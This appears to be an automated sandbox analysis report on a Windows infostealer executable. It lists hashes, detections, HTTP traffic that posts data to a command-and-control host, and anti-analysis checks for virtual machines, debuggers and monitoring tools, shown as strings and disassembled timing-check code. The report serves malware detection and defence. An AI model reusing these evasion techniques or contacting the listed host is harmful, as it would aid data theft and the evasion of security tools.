Windows Analysis Report
NWJ4JvzFcs.exe

Overview

General Information

Sample name: NWJ4JvzFcs.exe (renamed because original name is a hash value)
Original sample name: 91d22c615a675708fad7ddb68a64cf3f.exe
Analysis ID: 1581253
MD5: 91d22c615a675708fad7ddb68a64cf3f
SHA1: 3f83a7beba10482293899728cd505775f250c25f
SHA256: 71bee394da6e85dbc2b1d660dd215346a3a957cf2aba4ab3d505a84f7fb12798
Tags: exe, user-abuse_ch
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Detected potential crypto function
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NWJ4JvzFcs.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\NWJ4JvzFcs.exe" MD5: 91D22C615A675708FAD7DDB68A64CF3F)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: NWJ4JvzFcs.exe Avira: detected
Source: NWJ4JvzFcs.exe Virustotal: Detection: 34%
Source: NWJ4JvzFcs.exe ReversingLabs: Detection: 57%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: NWJ4JvzFcs.exe Joe Sandbox ML: detected
Source: NWJ4JvzFcs.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: NWJ4JvzFcs.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 558871
Source: global traffic HTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1 Host: home.fiveth5ht.top Accept: */*
Source: global traffic HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: Joe Sandbox View IP Address: 5.101.3.217
Source: Joe Sandbox View IP Address: 3.218.7.103
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknown HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: */* Content-Type: application/json Content-Length: 558871
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 08:08:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 08:08:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.css
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.jpg
Source: NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000003.1433408114.000000000209A000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1440149452.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433444924.000000000209D000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433998061.00000000020A5000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433028545.0000000002095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1
Source: NWJ4JvzFcs.exe, 00000004.00000002.1439964126.0000000002045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: NWJ4JvzFcs.exe, 00000004.00000003.1435430653.0000000002037000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1439854052.0000000002039000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1435386630.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://html4/loose.dtd
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ip
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705

System Summary

Source: NWJ4JvzFcs.exe Static PE information: section name:
Source: NWJ4JvzFcs.exe Static PE information: section name: .idata
Source: NWJ4JvzFcs.exe Static PE information: section name:
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Code function: 4_3_0204B469 4_3_0204B469
Source: NWJ4JvzFcs.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: NWJ4JvzFcs.exe Static PE information: Section: vsycrkux ZLIB complexity 0.994511902497233
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: NWJ4JvzFcs.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: NWJ4JvzFcs.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Section loaded: kernel.appcore.dll
Source: NWJ4JvzFcs.exe Static file information: File size 4522496 > 1048576
Source: NWJ4JvzFcs.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: NWJ4JvzFcs.exe Static PE information: Raw size of vsycrkux is bigger than: 0x100000 < 0x1c3c00

Data Obfuscation

Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Unpacked PE file: 4.2.NWJ4JvzFcs.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vsycrkux:EW;rssptqyp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vsycrkux:EW;rssptqyp:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: NWJ4JvzFcs.exe Static PE information: real checksum: 0x451ce9 should be: 0x459b48
Source: NWJ4JvzFcs.exe Static PE information: section name:
Source: NWJ4JvzFcs.exe Static PE information: section name: .idata
Source: NWJ4JvzFcs.exe Static PE information: section name:
Source: NWJ4JvzFcs.exe Static PE information: section name: vsycrkux
Source: NWJ4JvzFcs.exe Static PE information: section name: rssptqyp
Source: NWJ4JvzFcs.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Code function: 4_3_0209E704 push eax; retf 4_3_0209E705
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Code function: 4_3_0209CEAF pushad ; iretd 4_3_0209CEB9
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Code function: 4_3_0209AFA4 pushad ; iretd 4_3_0209B04D
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Code function: 4_3_0209CF60 pushad ; retf 4_3_0209CF61
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Code function: 4_3_02052182 pushad ; ret 4_3_020524E1
Source: NWJ4JvzFcs.exe Static PE information: section name: vsycrkux entropy: 7.955164567057714

Boot Survival

Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: PROCMON.EXE
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: X64DBG.EXE
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WINDBG.EXE
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144D8EF second address: 144D92D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F04A523FCC7h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F04A523FCC2h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144DB06 second address: 144DB0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144DB0C second address: 144DB7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 4741948Bh 0x00000012 mov ecx, ebx 0x00000014 lea ebx, dword ptr [ebp+1245F552h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F04A523FCB8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jmp 00007F04A523FCBDh 0x00000039 jmp 00007F04A523FCC5h 0x0000003e mov ecx, 3BA19317h 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144DB7D second address: 144DB87 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144DB87 second address: 144DB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F04A523FCB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 145F5C7 second address: 145F5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146DE66 second address: 146DE6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146DE6D second address: 146DE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 142EA59 second address: 142EA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 js 00007F04A523FCB6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F04A523FCBCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 142EA79 second address: 142EA7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146BE21 second address: 146BE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F04A523FCB6h 0x0000000a jmp 00007F04A523FCC2h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F04A523FCC1h 0x00000019 je 00007F04A523FCB6h 0x0000001f popad 0x00000020 jo 00007F04A523FCC2h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146BE62 second address: 146BE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C1A9 second address: 146C1B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F04A523FCB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C1B4 second address: 146C1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F04A523AA95h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C1DD second address: 146C1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C663 second address: 146C669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C669 second address: 146C66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C66F second address: 146C675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C675 second address: 146C679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C679 second address: 146C69C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C69C second address: 146C6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F04A523FCC2h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C6B5 second address: 146C6BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146CDCA second address: 146CDEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F04A523FCC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146D083 second address: 146D087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146D087 second address: 146D08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146D08F second address: 146D09F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F04A523AA86h 0x0000000a jno 00007F04A523AA86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1473AAC second address: 1473AE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F04A523FCC9h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F04A523FCB6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1475551 second address: 1475555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1475555 second address: 147555F instructions: 0x00000000 rdtsc 0x00000002 je 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147555F second address: 14755AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push esi 0x00000007 jmp 00007F04A523AA97h 0x0000000c jmp 00007F04A523AA8Dh 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F04A523AA90h 0x0000001b jmp 00007F04A523AA90h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147924F second address: 147925C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1478833 second address: 147884A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F04A523AA90h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1478DD2 second address: 1478DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147907A second address: 147909A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA96h 0x00000007 jno 00007F04A523AA86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147909A second address: 14790A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147C907 second address: 147C914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
